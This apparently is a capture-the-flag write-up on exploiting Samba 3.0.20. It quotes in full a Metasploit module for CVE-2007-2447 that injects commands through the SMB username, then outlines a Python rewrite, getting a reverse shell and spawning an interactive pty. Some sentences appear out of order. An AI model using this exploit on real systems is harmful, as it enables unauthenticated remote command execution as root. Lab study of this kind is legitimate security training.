Since FTP port is open and seems to allow Anonymous login we will try to log in and see if we can find anything
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB
# For our customized version of session_setup_ntlmv1
CONST = Rex::Proto::SMB::Constants
CRYPT = Rex::Proto::SMB::Crypt
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba "username map script" Command Execution',
'Description' => %q{
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
No authentication is needed to exploit this vulnerability since
this option is used to map usernames prior to authentication!
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10040 $',
'References' =>
[
[ 'CVE', '2007-2447' ],
[ 'OSVDB', '34700' ],
[ 'BID', '23972' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true, # root or nobody user
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
# *_perl and *_ruby work if they are installed
# mileage may vary from system to system..
}
},
'Targets' =>
[
[ "Automatic", { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 14 2007'))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
connect
# lol?
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
end
But that is a Metasploit module and we want to do it without it... if we read the exploit it says that its exploiting a vulnerability by specifying a username containing shell meta characters, executing commands... and no authentication is needed to exploit this vulnerability, with this information we can make our python script to exploit this samba version.
Exploitation
Creating the script
This is the skeleton of the python script we will use to exploit this Samba version
We might run into an error while executing the script
In order to fix it we have to install the following python module if we are missing it:
pip3 install pysmb
Now we can run it again.. and if we have our listener ready we should be able to get a shell back
Pwnd
We got a shell back, the first thing we look for is to make it interactive, for that matter we will see if the machine has python with
which python
In this particular case that will be enought, we can use the following command to spawn an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Now we can grab our flag ;)
We found nothing there, next thing we can see in our initial enumeration is that Samba is running with version 3.0.20-Debian, with a fast google search we will find that it is vulnerable to a Remote Heap Overflow
